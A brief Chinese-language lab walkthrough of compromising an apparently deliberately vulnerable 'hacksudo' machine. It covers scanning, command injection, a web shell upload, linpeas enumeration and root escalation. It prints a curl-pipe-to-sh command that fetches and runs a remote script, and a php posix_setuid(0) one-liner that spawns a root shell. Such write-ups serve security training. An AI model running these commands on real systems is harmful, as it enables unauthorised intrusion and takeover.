环境配置
一开始桥接错网卡了 搞了半天 改回来就行了
信息收集
漏洞发现
扫个目录
大概看了一眼没什么有用的信息 然后对着login.php跑了一下弱口令 sqlmap
都没跑出来 那么利用点应该不在这 考虑到之前有过dirsearch字典太小扫不到东西的经历
换个gobuster扫一下
先看看generator.php
随便填点东西执行一下 感觉像命令注入
尝试弹个shell
没成功
那就写了个一句话 然后用蚁剑传shell
提权
优化shell
看看还有没有用户,有可能待会会切过去
用linpeas枚举脆弱性
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
没看见特别显眼的
版本过高
考虑到有个hacksudo的用户
再收集一波信息看看能不能切过去
发现有个hacksudo的文件
有加密 一眼凯撒
没有sudo权限
在work路径下发现sh文件
没执行权限
也没看见相关的计划任务
再传个linpeas枚举
可以lxd提权
也可以view 或 php提权
这里用php提权
CMD="/bin/sh"
./home/hacksudo/locker/php -r "posix_setuid(0); system('$CMD');"